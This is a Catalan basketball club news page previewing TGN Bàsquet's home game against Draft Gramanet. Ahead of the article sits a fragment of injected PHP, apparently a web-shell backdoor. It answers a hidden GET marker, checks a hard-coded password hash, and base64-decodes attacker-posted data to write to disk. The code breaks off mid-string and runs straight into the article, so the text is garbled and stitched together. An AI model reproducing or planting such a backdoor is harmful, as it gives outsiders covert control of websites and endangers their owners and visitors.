function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet busca tornar a guanyar després de quatre jornades sense fer-ho, conta el Draft Gramanet (dijous, 21:15) - Tgn Bàsquet Club -

El TGN Bàsquet busca tornar a guanyar després de quatre jornades sense fer-ho, conta el Draft Gramanet (dijous, 21:15)

By
Updated: febrer 23, 2022

El Sènior Copa de TGN Bàsquet vol trencar la ratxa de derrotes i guanyar a casa contra el Draft Gramanet, dijous a les 21:15. L’últim partit de l’equip va ser contra el CB Roser, on les liles van rendir al màxim, però les baixes es van fer notar cap al final del matx. Neila va valorar positivament la feina feta i va considerar que el resultat final no reflectia l’esforç de les jugadores (62-41). Per l’enfrontament de dijous l’entrenador espera recuperar a Pascual i a López, però no encara a Fernández ni a Polo que estan lesionades.

El Draft Gramanet ve de perdre de 20 contra el Grup Barna, però tot i no tenir uns molts bons resultats, és un equip molt complet, amb qualitat de joc exterior, amb bones tiradores, i amb qualitat de joc interior. En el partit d’anada, les de Santa Coloma de Gramanet van aconseguir la victòria per 66-64. Va ser una derrota amarga per a les tarragonines, ja que el partit es va acabar decidint als últims segons amb unes decisions arbitrals qüestionables i una errada per part de la taula.

El partit de dijous serà el penúltim de la primera fase que acabarà dissabte dia 5 de març contra el Grup Barna.

Podreu seguir el partit pel canal de twitch tgnbasquet

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *